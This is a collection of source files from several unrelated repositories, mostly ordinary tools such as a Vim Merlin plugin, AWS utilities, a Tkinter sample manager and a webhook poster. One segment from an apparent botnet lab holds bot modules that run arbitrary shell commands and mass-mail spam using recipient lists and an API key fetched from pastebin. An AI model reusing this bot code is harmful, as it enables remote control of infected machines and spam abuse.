command_reset(name=vim.eval("expand('%:p')"))
content = cb[:end_line]
process.saved_sync = curr_sync
# Send content
if content:
kind = "source"
while not command_tell(kind,content):
kind = "more"
if end_line < max_line:
next_end = min(max_line,end_line + 20)
content = cb[end_line:next_end]
end_line = next_end
else:
content = None
# Now we are synced, come back to environment around cursor
command_seek_exact(to_line, to_col)
def sync_buffer():
to_line, to_col = vim.current.window.cursor
sync_buffer_to(to_line, to_col)
def sync_full_buffer():
sync_buffer_to(len(vim.current.buffer),0)
def vim_complete_cursor(base, vimvar):
vim.command("let %s = []" % vimvar)
line, col = vim.current.window.cursor
wspaces = re.compile("[\n ]+")
try:
sync_buffer()
props = command_complete_cursor(base,line,col)
for prop in props:
vim.command("let l:tmp = {'word':'%s','menu':'%s','info':'%s','kind':'%s'}" %
(prop['name'].replace("'", "''")
,re.sub(wspaces, " ", prop['desc']).replace("'", "''")
,prop['info'].replace("'", "''")
,prop['kind'][:1].replace("'", "''")
))
vim.command("call add(%s, l:tmp)" % vimvar)
except MerlinExc as e:
try_print_error(e)
def vim_loclist(vimvar, ignore_warnings):
vim.command("let %s = []" % vimvar)
errors = command_report_errors()
bufnr = vim.current.buffer.number
nr = 0
for error in errors:
if error['type'] == 'warning' and vim.eval(ignore_warnings) == 'true':
continue
ty = 'w'
if error['type'] == 'type' or error['type'] == 'parser':
ty = 'e'
lnum = 1
lcol = 1
if error.has_key('start'):
lnum = error['start']['line']
lcol = error['start']['col'] + 1
vim.command("let l:tmp = {'bufnr':%d,'lnum':%d,'col':%d,'vcol':0,'nr':%d,'pattern':'','text':'%s','type':'%s','valid':1}" %
(bufnr, lnum, lcol, nr, error['message'].replace("'", "''").replace("\n", " "), ty))
nr = nr + 1
vim.command("call add(%s, l:tmp)" % vimvar)
def vim_find_list(vimvar):
pkgs = command_find_list()
vim.command("let %s = []" % vimvar)
for pkg in pkgs:
vim.command("call add(%s, '%s')" % (vimvar, pkg))
def vim_type(expr,is_approx=False):
to_line, to_col = vim.current.window.cursor
cmd_at = ["at", {'line':to_line,'col':to_col}]
sync_buffer_to(to_line,to_col)
cmd_expr = ["expression", expr] if expr else []
try:
cmd = ["type"] + cmd_expr + cmd_at
ty = send_command(*cmd)
if isinstance(ty,dict):
if "type" in ty: ty = ty['type']
else: ty = str(ty)
if is_approx: sys.stdout.write("(approx) ")
if expr: print(expr + " : " + ty)
else: print(ty)
except MerlinExc as e:
if re.search('Not_found',str(e)):
pass
else:
try_print_error(e)
def vim_locate_at_cursor(path):
line, col = vim.current.window.cursor
sync_buffer_to(line, col)
command_locate(path, line, col)
def vim_locate_under_cursor():
delimiters = [' ', '\n', '=', ';', ',', '(', ')', '[', ']', '{', '}', '|', '"',"+","-","*","/" ]
line_nb, col_nb = vim.current.window.cursor
line = vim.current.buffer[line_nb - 1]
start = col_nb
stop = col_nb
while start > 0:
if line[start - 1] in delimiters:
break
else:
start -= 1
while stop < len(line):
# we stop on dots because on "Foo.Ba<cursor>r.Baz.lol" I want to jump at the
# definition of Bar, not the one of lol.
if line[stop] in delimiters or line[stop] == '.':
break
else:
stop += 1
vim_locate_at_cursor(line[start:stop])
def bounds_of_ocaml_atom_at_pos(to_line, col):
line = vim.current.buffer[to_line]
start = col
stop = col
while start > 0:
if atom_bound.match(line[start - 1]) is None:
break
else:
start -= 1
while stop < len(line):
if atom_bound.match(line[stop]) is None:
break
else:
stop += 1
return (line[start:stop], start, stop)
# expr used as fallback in case type_enclosing fail
def vim_type_enclosing(vimvar,expr=None):
global enclosing_types
global current_enclosing
enclosing_types = [] # reset
current_enclosing = -1
to_line, to_col = vim.current.window.cursor
atom, a_start, a_end = bounds_of_ocaml_atom_at_pos(to_line - 1, to_col)
offset = to_col - a_start
pos = {'line':to_line, 'col':to_col}
arg = {'expr':atom, 'offset':offset}
sync_buffer()
try:
enclosing_types = send_command("type", "enclosing", arg, pos)
if enclosing_types != []:
vim_next_enclosing(vimvar)
else:
print("didn't manage to type '%s'" % atom)
except MerlinExc as e:
try_print_error(e)
def easy_matcher(start, stop):
startl = ""
startc = ""
if start['line'] > 0:
startl = "\%>{0}l".format(start['line'] - 1)
if start['col'] > 0:
startc = "\%>{0}c".format(start['col'])
return '{0}{1}\%<{2}l\%<{3}c'.format(startl, startc, stop['line'] + 1, stop['col'] + 1)
def hard_matcher(start, stop):
first_start = {'line' : start['line'], 'col' : start['col']}
first_stop = {'line' : start['line'], 'col' : 4242}
first_line = easy_matcher(first_start, first_stop)
mid_start = {'line' : start['line']+1, 'col' : 0}
mid_stop = {'line' : stop['line']-1 , 'col' : 4242}
middle = easy_matcher(mid_start, mid_stop)
last_start = {'line' : stop['line'], 'col' : 0}
last_stop = {'line' : stop['line'], 'col' : stop['col']}
last_line = easy_matcher(last_start, last_stop)
return "{0}\|{1}\|{2}".format(first_line, middle, last_line)
def make_matcher(start, stop):
if start['line'] == stop['line']:
return easy_matcher(start, stop)
else:
return hard_matcher(start, stop)
def vim_next_enclosing(vimvar):
if enclosing_types != []:
global current_enclosing
if current_enclosing < len(enclosing_types):
current_enclosing += 1
if current_enclosing < len(enclosing_types):
tmp = enclosing_types[current_enclosing]
matcher = make_matcher(tmp['start'], tmp['end'])
vim.command("let {0} = matchadd('EnclosingExpr', '{1}')".format(vimvar, matcher))
print(tmp['type'])
def vim_prev_enclosing(vimvar):
if enclosing_types != []:
global current_enclosing
if current_enclosing >= 0:
current_enclosing -= 1
if current_enclosing >= 0:
tmp = enclosing_types[current_enclosing]
matcher = make_matcher(tmp['start'], tmp['end'])
vim.command("let {0} = matchadd('EnclosingExpr', '{1}')".format(vimvar, matcher))
print(tmp['type'])
# Resubmit current buffer
def vim_reload_buffer():
clear_cache()
sync_buffer()
# Reload changed cmi files then retype all definitions
def vim_reload(full=False):
command_reload(full)
# Spawn a fresh new process
def vim_restart():
merlin_process().restart()
path = vim.eval("expand('%:p')")
load_project(path, force=True)
def vim_which(name,ext):
if ext:
name = name + "." + ext
return command_which_file(name)
def vim_which_ext(ext,vimvar):
files = command_which_with_ext(ext)
vim.command("let %s = []" % vimvar)
for f in sorted(set(files)):
vim.command("call add(%s, '%s')" % (vimvar, f))
def vim_use(*args):
return command_find_use(*args)
def vim_ext(enable, exts):
if enable:
catch_and_print(lambda: command_ext_enable(*exts))
else:
catch_and_print(lambda: command_ext_disable(*exts))
def vim_ext_list(vimvar,enabled=None):
if enabled == None:
exts = command_ext_list()
elif enabled:
exts = command_ext_enabled()
else:
exts = command_ext_disabled()
vim.command("let %s = []" % vimvar)
for ext in exts:
vim.command("call add(%s, '%s')" % (vimvar, ext))
def vim_clear_flags():
global flags
flags = []
vim_restart()
def vim_add_flags(*args):
flags.extend(args)
vim_restart()
def vim_selectphrase(l1,c1,l2,c2):
# In some context, vim set column of '> to 2147483647 (2^31 - 1)
# This cause the merlin json parser on 32 bit platforms to overflow
bound = 2147483647 - 1
vl1 = min(bound,int(vim.eval(l1)))
vc1 = min(bound,int(vim.eval(c1)))
vl2 = min(bound,int(vim.eval(l2)))
vc2 = min(bound,int(vim.eval(c2)))
sync_buffer_to(vl2,vc2)
command_seek_exact(vl2,vc2)
loc2 = send_command("boundary")
if vl2 != vl1 or vc2 != vc1:
command_seek_exact(vl1,vc1)
loc1 = send_command("boundary")
else:
loc1 = None
if loc2 == None:
return
vl1 = loc2[0]['line']
vc1 = loc2[0]['col']
vl2 = loc2[1]['line']
vc2 = loc2[1]['col']
if loc1 != None:
vl1 = min(loc1[0]['line'], vl1)
vc1 = min(loc1[0]['col'], vc1)
vl2 = max(loc1[1]['line'], vl2)
vc2 = max(loc1[1]['col'], vc2)
for (var,val) in [(l1,vl1),(l2,vl2),(c1,vc1),(c2,vc2)]:
vim.command("let %s = %d" % (var,val))
def load_project(directory,force=False):
command = [vim.eval("merlin#FindOcamlMerlin()"), "-project-find", directory]
process = subprocess.Popen(command, stdout=subprocess.PIPE)
name = process.communicate()[0].strip()
if not force:
if name == vim.eval("b:merlin_project"): return
vim.command("let b:merlin_project = '%s'" % name)
fnames = display_load_failures(catch_and_print(lambda: send_command("project","find",directory)))
if isinstance(fnames, list):
vim.command('let b:dotmerlin=[%s]' % ','.join(map(lambda fname: '"'+fname+'"', fnames)))
sync_buffer_to(1, 0)
``` |
{
"source": "jpdesigns316/item-catalog",
"score": 3
} |
#### File: item-catalog/src/runme.py
```python
from tempfile import mkstemp
from shutil import move
from os import close, remove
import os
import fileinput
class InstallationMenu(object):
def __init__(self):
self.menu_options = ["Programming by Reading Installation Menu",
"Purge Old Data and Create New Database",
"Set Client ID",
"Install modules",
"Run Server",
"Quit"]
self.old_client_id = "844476090512-hq31f24hb62jg757e22im6hnjp513k37"
self.menu()
# Deletes the books.db then creates and populates a new books.db
def purge_db(self):
os.system("del books.db")
os.system("python database_setup.py")
print "Populating database with default books."
os.system("python add_books_to_db.py")
self.menu()
# This will change the old client id (self.old_client_id) and replace it
# with the one you input. It will then save the one you inputed into the
# old client Id so it can easily be changed at a later date.
def set_client_id(self):
print "Client ID is currently on ", self.old_client_id
client_id = raw_input("Enter your client id: ")
file_path = 'templates/base.jinja2'
fh, abs_path = mkstemp()
with open(abs_path,'w') as new_file:
with open(file_path) as old_file:
for line in old_file:
new_file.write(line.replace(self.old_client_id, client_id))
self.old_client_id = client_id
close(fh)
#Remove original file
remove(file_path)
#Move new file
move(abs_path, file_path)
self.menu()
def install(self):
os.system('pip install -r requirements.txt')
self.menu()
def runserver(self):
os.system('python run.py')
def menu(self):
selection = {1 : self.purge_db,
2 : self.set_client_id,
3 : self.install,
4 : self.runserver,
5 : exit}
for x in range(0,len(self.menu_options)):
if x > 0:
print x,
print self.menu_options[x]
choice = int(raw_input("Enter your choice: "
))
if choice < 1 or choice > len(self.menu_options):
print "Invalid Choice!"
self.menu()
selection.get(choice)()
menu = InstallationMenu()
``` |
{
"source": "jpdh88/ableton_samples_cleanup",
"score": 3
} |
#### File: jpdh88/ableton_samples_cleanup/MAIN_PROGRAM.py
```python
from tkinter import *
from tkinter import messagebox
from tkinter import ttk
# ------------------------------
# METHODS: for searching folders and building lists
from fn_search_for_all_samples import fn_search_for_all_samples
from fn_search_ableton_projects import fn_search_ableton_projects
from fns_manip_sample_files import fn_move_sample_files
from fns_manip_sample_files import fn_copy_sample_files
from fn_find_unused_samples import fn_find_unused_samples
# ------------------------------
# METHODS: for moving items between the tkinter objects
# - move an item from the left listbox to the right listbox
def tk_move_items_right ():
li_samples_on_right = list(tkLB_samples_to_move.get(0, END)) # copy existing contents to array
li_samples_on_left = list(tkLB_unused_samples.get(0, END))
li_samples_to_move = [tkLB_unused_samples.get(item) for item in tkLB_unused_samples.curselection()]
for item in li_samples_to_move:
if item not in li_samples_on_right:
# colour item in left listbox
item_index = li_samples_on_left.index(item)
tkLB_unused_samples.itemconfig(item_index, bg="gray")
# add item to right array
li_samples_on_right.append(item)
# delete existing contents (we have already copied them to an array)
tkLB_samples_to_move.delete(0, END)
# populate the right listbox with modified right array
for item in li_samples_on_right:
tkLB_samples_to_move.insert(END, item)
# - remove an item from the right listbox
def tk_remove_items_right ():
li_samples_on_left = list(tkLB_unused_samples.get(0, END))
li_samples_on_right = list(tkLB_samples_to_move.get(0, END))
li_items_to_remove = [tkLB_samples_to_move.get(item) for item in tkLB_samples_to_move.curselection()]
for item in li_items_to_remove:
# remove colouring from item in left listbox
item_index = li_samples_on_left.index(item)
tkLB_unused_samples.itemconfig(item_index, bg="white")
# remove item from right array
li_samples_on_right.remove(item)
# delete existing contents (we have already copied them to an array)
tkLB_samples_to_move.delete(0, END)
# populate the right listbox with modified right array
for item in li_samples_on_right:
tkLB_samples_to_move.insert(END, item)
li_samples_to_move = []
# - Widget call method: find all unused samples and write them to the left listbox
def tk_add_unused_samples ():
li_unused_samples = fn_find_unused_samples( fn_search_for_all_samples(tkEN_samples_folder.get()),\
fn_search_ableton_projects(tkEN_projects_folder.get())\
)
tkLB_samples_to_move.delete(0, END)
tkLB_unused_samples.delete(0, END)
for index, item in enumerate(li_unused_samples):
tkLB_unused_samples.insert(END, item)
# METHODS: for moving and copying files
# - Confirmation dialogue
def tk_confirm_box (message):
response = messagebox.askquestion ( "Confirmation", \
"Are you sure you want to " + message + " these files? You can't undo this.",\
icon = "warning")
return response
# - Widget call method: MOVE selected files to new location
def tk_move_samples ():
if tk_confirm_box("move") == "yes":
fn_move_sample_files( tkEN_samples_folder.get(), \
tkEN_new_folder.get(), \
list(tkLB_samples_to_move.get(0, END)) \
)
tkLB_samples_to_move.delete(0, END)
tkLB_unused_samples.delete(0, END)
tk_add_unused_samples ()
# - Widget call method: COPY selected files to new location
def tk_copy_samples ():
if tk_confirm_box("copy") == "yes":
fn_copy_sample_files( tkEN_samples_folder.get(), \
tkEN_new_folder.get(), \
list(tkLB_samples_to_move.get(0, END)) \
)
# ------------------------------
# CONFIGURE GUI
root = Tk()
root.title("Sample Search and Move")
# - set window attributes
root.resizable(False, False)
window_width = 1000
window_height = 700
bg_color = "#F3E5AB"
root.geometry(str(window_width) + "x" + str(window_height))
root.configure(background=bg_color)
# ------------------------------
# DRAW GUI
# - separator line
canvas = Canvas(root, width=window_width, height=window_height, background=bg_color)
canvas.create_line(5, 70, window_width-5, 70, width=2)
canvas.place(x = 0, y = 0)
# - create Entry: for user to input samples folder
tkLB_samples_folder = Label(root, text="Samples directory:")
tkLB_samples_folder.place(x = 5, y = 6) #DRAW
tkEN_samples_folder = Entry(root, width=77)
tkEN_samples_folder.place(x = 140, y = 5) #DRAW
tkEN_samples_folder.insert(0, "/Users/josephhaley/Music/*samples folder*/")
# - create Entry: for user to input projects folder
tkLB_projects_folder = Label(root, text="Projects directory:")
tkLB_projects_folder.place(x = 5, y = 35) #DRAW
tkEN_projects_folder = Entry(root, width=77)
tkEN_projects_folder.place(x = 140, y = 35) #DRAW
tkEN_projects_folder.insert(0, "/Users/josephhaley/Music/*projects folder*/")
# - create Button: search for unused samples
tkBU_samples_folder = Button(root, text="Find unused samples", \
height=3, \
command=tk_add_unused_samples)
tkBU_samples_folder.place(x = window_width-150, y = 7)
# - create Listbox: list of unused samples
tkLL_unused_samples = Label(root, text="All unused samples")
tkLL_unused_samples.place(x = 270, y = 76)
tkLB_unused_samples = Listbox(root, width=40, selectmode=EXTENDED, borderwidth=2)
tkLB_unused_samples.place(x = 5, y = 104, width = 400, height = 525) #DRAW
# - create Listbox: samples to move
tkLL_samples_to_move = Label(root, text="Samples to be moved")
tkLL_samples_to_move.place(x = 592, y = 76)
tkLB_samples_to_move = Listbox(root, width=40, selectmode=EXTENDED, borderwidth=2)
tkLB_samples_to_move.place(x = 592, y = 104, width = 400, height = 525) #DRAW
# - create Button: move item from left to right
tkBU_samples_folder = Button(root, text="Move to > > >", command=tk_move_items_right)
tkBU_samples_folder.place(x = 450, y = 280)
# - create Button: remove item from right and dehighlight item in left
tkBU_samples_folder = Button(root, text="Remove item", command=tk_remove_items_right)
tkBU_samples_folder.place(x = 450, y = 315)
# - separator line
canvas.create_line(5, window_height-36, window_width-5, window_height-36, width=2)
canvas.place(x = 0, y = 0)
# - create Entry: for user to input new samples folder
tkLB_new_folder = Label(root, text="Move samples to:")
tkLB_new_folder.place(x = 5, y = window_height-31) #DRAW
tkEN_new_folder = Entry(root, width=69)
tkEN_new_folder.place(x = 140, y = window_height-32) #DRAW
tkEN_new_folder.insert(0, "/Users/josephhaley/Music/*new samples folder*")
# - create Button: move samples to new folder
tkBU_move_samples = Button (root, \
text="MOVE samples", \
command=tk_move_samples)
tkBU_move_samples.place(x = window_width-110, y=window_height-31)
# - create Button: copy samples to new folder
tkBU_move_samples = Button (root, \
text="COPY samples", \
command=tk_copy_samples)
tkBU_move_samples.place(x = window_width-220, y=window_height-31)
# ------------------------------
root.mainloop()
``` |
{
"source": "jpdhas/cloudwatch_alarm_to_slack",
"score": 3
} |
#### File: cloudwatch_alarm_to_slack/events/cloudwatch.py
```python
import cloudwatch_alarm_to_slack.utils.log as log
from cloudwatch_alarm_to_slack.events.slack import Slack
from cloudwatch_alarm_to_slack.models.cloudwatch import (CloudwatchEvent,
CloudwatchTrigger)
LOGGER = log.custom_logger(__name__)
class CloudwatchAlarm:
"""Handle a cloudwatch alarm from SNS."""
@staticmethod
def process_alarm(alarm={}):
"""Process incoming cloudwatch alarm."""
cloudwatch_event = CloudwatchEvent(
account=alarm.get('AWSAccountId'),
name=alarm.get('AlarmName'),
description=alarm.get('AlarmDescription'),
region=alarm.get('Region'),
state=alarm.get('NewStateValue'),
trigger=CloudwatchTrigger(
metric=alarm.get('Trigger').get('MetricName'),
namespace=alarm.get('Trigger').get('Namespace'),
statistic=alarm.get('Trigger').get('Statistic'),
comparison_operator=alarm.get('Trigger').get('ComparisonOperator'),
threshold=alarm.get('Trigger').get('Threshold'),
period=alarm.get('Trigger').get('Period'),
evaluation_period=alarm.get('Trigger').get('EvaluationPeriods')
)
)
LOGGER.info(' Processing Cloudwatch event: %s', cloudwatch_event)
alarm_state = CloudwatchAlarm.message_status(alarm_state=alarm.get('NewStateValue'))
attachment = Slack.format_message(
alarm=cloudwatch_event,
state=alarm_state
)
Slack().send_message(
attachment=attachment
)
@staticmethod
def message_status(alarm_state=None):
"""Set status of slack message based on cloudwatch alarm status."""
if alarm_state == "ALARM":
color = "danger"
elif alarm_state == "OK":
color = "good"
else:
color = "warning"
return color
```
#### File: cloudwatch_alarm_to_slack/tests/conftest.py
```python
import pytest
@pytest.fixture(autouse=True)
def default_env_vars(monkeypatch):
"""Set default environment variables."""
monkeypatch.setenv('SLACK_BOT_TOKEN', '<PASSWORD>token')
monkeypatch.setenv('SLACK_CHANNEL', 'test_slack_channel')
``` |
{
"source": "jpdias/botnet-lab",
"score": 3
} |
#### File: bot/addons/shell.py
```python
import subprocess
def shell(cmd):
try:
output = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True).communicate()[0]
return output.replace("\r", " - ").replace("\n", " - ")
except:
output = "FAILED"
return output
```
#### File: bot/addons/spam.py
```python
import urllib2
import mandrillwrapper
# spam->http://pastebin.com/raw.php?i=qzCh8DCe-http://pastebin.com/raw.php?i=AAF54Du3
# http://pastebin.com/raw.php?i=PRm68quh
def spam(to_url, msg_url):
# print to_url +" "+msg_url
try:
to_data = urllib2.urlopen(to_url)
msg_data = urllib2.urlopen(msg_url)
to_list = []
msgs = ""
for mail in to_data:
to_list.append(mail)
for txt in msg_data:
if txt.find('FROM') != -1:
fromadd = txt.split(":")[1]
elif txt.find('SUBJECT') != -1:
subj = txt.split(":")[1]
elif txt.find('APIKEY') != -1:
apikey = txt.split(":")[1]
else:
msgs += txt
except:
return "Failed to retrieve sources."
try:
post_mail(to_list, msgs, subj, fromadd, apikey)
return "Send"
except:
return "Failed to send."
def post_mail(to_list, msgs, subj, fromadd, apikey):
mandrill_client = mandrillwrapper.Mandrill(apikey.replace("\n", "").replace("\r", ""))
message = {
'from_email': fromadd,
'from_name': fromadd.split("@")[0],
'html': '<p>' + msgs + '</p>',
'important': False,
'merge': True,
'subject': subj,
'to': [{'email': ",".join(to_list)}]
}
mandrill_client.messages.send(message=message, async=False)
``` |
{
"source": "jpdias/jpdias.github.io",
"score": 3
} |
#### File: assets/summer2020/streamside.py
```python
import requests
import datetime
import string
import sys
ALPHABET = string.printable
RETRIES = 1
def fetch(url, datain):
dataa = {"flag": datain}
r = requests.post(url, data = dataa)
return r.elapsed.total_seconds()
def main(url):
pass_so_far = '<PASSWORD>'
while True:
print('\n[>] Password so far: "%s"\n' % pass_so_far)
times = {}
for p in ALPHABET:
times[p] = 0
password = <PASSWORD> + p
#reduce false-positives
t = min(fetch(url, password),fetch(url, password))
times[p] = t
if ord(p) > 32:
print('\tLetter: "%s" - time: %f' % (password, t))
max_time = [0,0]
for item in times:
if times[item] > max_time[1]:
max_time[0] = item
max_time[1] = times[item]
pass_so_far += max_time[0]
if __name__ == '__main__':
if len(sys.argv) < 3:
print('usage: http-auth-timing.py <url>')
main(sys.argv[1])
``` |
{
"source": "jpdillingham/Kodi-StereoSnitch",
"score": 3
} |
#### File: jpdillingham/Kodi-StereoSnitch/stereosnitch.py
```python
import sys
import os
import re
# Search the specified directory for all *.nfo files
def searchdirectory(directory):
print("Searching directory " + directory + "...")
for root, dirs, files in os.walk(directory, topdown=False):
for name in files:
if name.endswith(".nfo"):
checknfo(os.path.join(root, name))
# Check the contents of the specified NFO for 2 channel audio
def checknfo(nfo):
contents = readfile(nfo)
try:
m = re.search(r"<channels>(.*)<\/channels>", contents)
if m.group(1) == '2':
print(nfo)
except:
pass
# Read and return the contents of the specified file
# If the read fails for any reason, return an empty string
def readfile(filename):
try:
with open(filename) as f:
return f.read()
except:
return ""
# Check the input, and if it is valid search the specified directory
if len(sys.argv) == 1:
print("Specify a directory to search.")
elif not os.path.isdir(sys.argv[1]):
print("Directory '" + sys.argv[1] + "' not found.")
else:
searchdirectory(sys.argv[1])
``` |
{
"source": "jpdoe/Engeto-python-project-3",
"score": 3
} |
#### File: jpdoe/Engeto-python-project-3/csv_writter.py
```python
import csv
import sys
def write_csv(file, data):
with open(file + ".csv", "w", newline="") as csv_file:
header = data[0].keys()
writer = csv.DictWriter(csv_file, fieldnames=header)
try:
writer.writeheader()
writer.writerows(data)
except csv.Error as e:
sys.exit(f"CSV Error: {e}")
```
#### File: jpdoe/Engeto-python-project-3/el_scraper.py
```python
import sys
import requests
from bs4 import BeautifulSoup
import csv_writter
def check_args(bad_urls, base_url, argv):
if len(argv) == 3:
try:
url = str(argv[1])
csv_file = str(argv[2])
if (base_url not in url) or url in bad_urls:
sys.exit("Wrong URL for scraping")
else:
return url, csv_file
except ValueError:
sys.exit("Wrong type of arguments")
else:
sys.exit("Wrong number of arguments")
def get_soup(url):
try:
page = requests.get(url)
return BeautifulSoup(page.text, "html.parser")
except requests.exceptions.ConnectionError as e:
sys.exit(f"Problem with connection: {e}")
def norm_int(string):
# replace unicode non-breakable space
try:
return int(string.replace("\xa0", ""))
except ValueError as e:
sys.exit(f"Problem with value: {e}")
def get_municip_info(url, muni):
# prepare alphabet soup
soup = get_soup(url)
muni["registered"] = norm_int(soup.find("td", {"headers": "sa2"}).text)
muni["envelopes"] = norm_int(soup.find("td", {"headers": "sa3"}).text)
muni["valid"] = norm_int(soup.find("td", {"headers": "sa6"}).text)
# parties table
tables = soup.find_all("table", {"class": "table"})[1:]
for table in tables:
# extract table rows and remove header
parties = table.find_all("tr")[2:]
for party in parties:
party_name = party.td.findNext("td").text
# skip empty row
if party_name == "-":
continue
# get number of votes for party
muni[party_name] = norm_int(party.td.findNext("td").findNext("td").text)
def get_data(url):
municip_list = []
soup = get_soup(url)
tables = soup.find_all("table", {"class": "table"})
for table in tables:
# extract table rows and remove header
municip_rows = table.find_all("tr")[2:]
for row in municip_rows:
# skip empty rows
if row.find("td").text == "-":
continue
mun_tmp = {
"code": "",
"name": "",
"registered": 0,
"envelopes": 0,
"valid": 0,
}
municip_url = BASE_URL + row.find("a")["href"]
# get code & name
mun_tmp["code"] = row.find("a").text
mun_tmp["name"] = row.a.findNext("td").text
# get municipality info
get_municip_info(municip_url, mun_tmp)
municip_list.append(mun_tmp)
return municip_list
if __name__ == "__main__":
# foreign voting places and main page
BAD_URLS = [
"https://volby.cz/pls/ps2017nss/ps36?xjazyk=CZ",
"https://volby.cz/pls/ps2017nss/ps3?xjazyk=CZ",
]
BASE_URL = "https://volby.cz/pls/ps2017nss/"
URL, CSV_FILE = check_args(BAD_URLS, BASE_URL, sys.argv)
data = get_data(URL)
csv_writter.write_csv(CSV_FILE, data)
print(f"Scraping is done. Output is in {CSV_FILE}.csv")
``` |
{
"source": "jpdoria/aws-es-index-snapshot",
"score": 2
} |
#### File: aws-es-index-snapshot/aws_eis/aws_eis.py
```python
import pkg_resources
import sys
from aws_eis.lib import test_con, get_version, py_version
from aws_eis.lib import cleanup, create, register, restore, set_args
def main():
# Check Python version
py_version()
parser = set_args()
args = parser.parse_args()
# Print help if no arguments are received
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
# Commands and their functions
if args.command == 'create':
test_con(args.endpoint)
create(args)
elif args.command == 'restore':
test_con(args.endpoint)
restore(args)
elif args.command == 'cleanup':
test_con(args.endpoint)
cleanup(args)
elif args.command == 'register':
test_con(args.endpoint)
register(args)
elif args.command == 'status':
test_con(args.endpoint)
elif args.command == 'version':
print(pkg_resources.require('aws_eis')[0].version)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print('\nGoodbye!')
sys.exit(1)
```
#### File: aws_eis/lib/restore.py
```python
import json
import sys
import requests
def restore(args):
endpoint = args.endpoint
snap_name = args.snapshot_name
print('Note: you cannot restore a snapshot of your indices to an ' +
'Elasticsearch cluster that already contains indices with ' +
'the same names. Currently, Amazon ES does not support ' +
'the Elasticsearch _close API, so you must use one of the ' +
'following alternatives:\n\n' +
'1. Delete the indices on the {}, '.format(endpoint) +
'then restore the snapshot\n' +
'2. Restore the snapshot to a different Amazon ES domain\n')
while True:
try:
choice = int(input('Choose an option: [1/2] '))
except KeyboardInterrupt:
print('\nGoodbye!')
sys.exit(1)
except ValueError as e:
print('Please choose between 1 and 2.')
else:
if choice == 1:
print('Deleting indices on {}...'.format(endpoint))
r = requests.delete('https://{}/_all'.format(endpoint))
ack = json.loads(r.text)['acknowledged']
if ack is True:
print('Indices have been removed!')
else:
print('Unable to remove indices!')
sys.exit(1)
snap_dir = '_snapshot/weblogs-index-backups/'
print('Restoring {}...'.format(snap_name))
r = requests.post(
'https://{0}/{1}/{2}/_restore'
.format(endpoint, snap_dir, snap_name)
)
if r.status_code == 200:
print('Success! Please allow time for complete ' +
'restoration.'.format(snap_name))
sys.exit(0)
else:
print(r.text)
sys.exit(1)
elif choice == 2:
url = 'https://{}/_snapshot/weblogs-index-backups'.format(
endpoint)
r = requests.get(url)
bucket_name = json.loads(r.text)[
'weblogs-index-backups']['settings']['bucket']
print('\nSnapshotDirectory: weblogs-index-backups')
print('S3Bucket: {}\n'.format(bucket_name))
print('Please register the snapshot directory to ' +
'your new Amazon Elasticsearch Service domain ' +
'then execute \'restore\' again.')
sys.exit(1)
else:
print('Please choose between 1 and 2.')
``` |
{
"source": "jpdoria/ebs-expand",
"score": 3
} |
#### File: ebs_expand/lib/set_args.py
```python
import argparse
def set_args():
ap = argparse.ArgumentParser(
description='Automate root volume expanding on Linux EBS-backed ' +
'EC2 instance.'
)
ap.add_argument(
'-r',
'--region',
help='AWS region is a geographical area (e.g., ap-southeast-1)',
required=True
)
ap.add_argument(
'-i',
'--instance-id',
help='Instance ID (e.g., i-1234567)',
required=True
)
ap.add_argument(
'-s',
'--size',
help='Desired size for the new EBS volume in GiB (e.g., 10 GiB)',
required=True
)
ap.add_argument(
'-v',
'--version',
help='Display current version of ebs_expand',
action='version',
version='%(prog)s (v1.1)'
)
return ap
``` |
{
"source": "jpdoria/github-facebook",
"score": 3
} |
#### File: jpdoria/github-facebook/gh-fb.py
```python
import hashlib
import hmac
import os
import facebook
from flask import Flask, redirect, request
app = Flask(__name__)
def fb_post(author, repo_name, repo_url, commit_message, commit_id,
description):
"""
This function receives the params from the webhook() then invokes the
put_wall_post() to create a new post on the user's timeline on Facebook.
"""
fb = facebook.GraphAPI(access_token=os.environ['FB_USER_TOKEN'],
version='2.7')
picture = 'https://cdn.lazyadm.in/Octocat/Octocat.jpg'
attachment = {
'name': '[GitHub] {0}/{1}'.format(author, repo_name),
'link': repo_url,
'caption': 'GitHub',
'description': description,
'picture': picture
}
fb.put_wall_post(message='[{0}] {1} | {2} - {3}'.format(
commit_id, repo_name, commit_message, author), attachment=attachment)
@app.route('/webhook', methods=['POST'])
def webhook():
"""
Compute the hash using GH_WEBHOOK_SECRET and ensure
that the hash from GitHub matches.
Reference: https://developer.github.com/webhooks/securing/
"""
x_hub_signature = request.headers.get('X-Hub-Signature')
if x_hub_signature is None:
print('X-Hub-Signature not found')
return 'X-Hub-Signature not found', 404
else:
sha_name, signature = x_hub_signature.split('=')
mac = hmac.new(bytes(os.environ['GH_WEBHOOK_SECRET'], 'utf-8'),
msg=request.data, digestmod=hashlib.sha1)
if sha_name != 'sha1':
print('Incorrect hash signature')
return 'Incorrect hash signature', 403
if signature is None:
print('Signature not found')
return 'Signature not found', 404
if hmac.compare_digest(mac.hexdigest(), signature):
print('Hash OK')
else:
print('Forbidden')
return 'Forbidden', 403
"""
Basically, this retrieves information after pushing a code to GitHub.
Information like: author, repository name, repository URL, commit message,
and timestamp.
An example of webhook payload can be found here:
https://developer.github.com/v3/activity/events/types/#webhook-payload-example-19
"""
data = request.get_json()
author = data['head_commit']['author']['username']
repo_name = data['repository']['name']
repo_url = data['repository']['url']
commit_message = data['head_commit']['message']
commit_id = data['head_commit']['id'][:7]
description = data['repository']['description']
fb_post(author, repo_name, repo_url, commit_message, commit_id,
description)
print('Post OK')
return 'Post OK', 200
@app.route('/', methods=['GET'])
def main():
return redirect('http://www.lazyadm.in/', code=301)
if __name__ == '__main__':
app.run(debug=True, use_reloader=True)
``` |
{
"source": "jpdpeters/Submission-Udacity-Image-Classifier",
"score": 2
} |
#### File: jpdpeters/Submission-Udacity-Image-Classifier/train.py
```python
import argparse
import torch
from collections import OrderedDict
from os.path import isdir
from torch import nn
from torch import optim
from torchvision import datasets, transforms, models
def arg_parser():
parser = argparse.ArgumentParser(description="Neural Network Settings")
parser.add_argument('--arch',
type=str,
help='Choose architecture from torchvision.models as str')
parser.add_argument('--save_dir',
type=str,
help='Define save directory for checkpoints as str. \nIf not specified then model will be lost.')
parser.add_argument('--learning_rate',
type=float,
help='Define gradient descent learning rate as float')
parser.add_argument('--hidden_units',
type=int,
help='Hidden units for DNN classifier as int')
parser.add_argument('--epochs',
type=int,
help='Number of epochs for training as int')
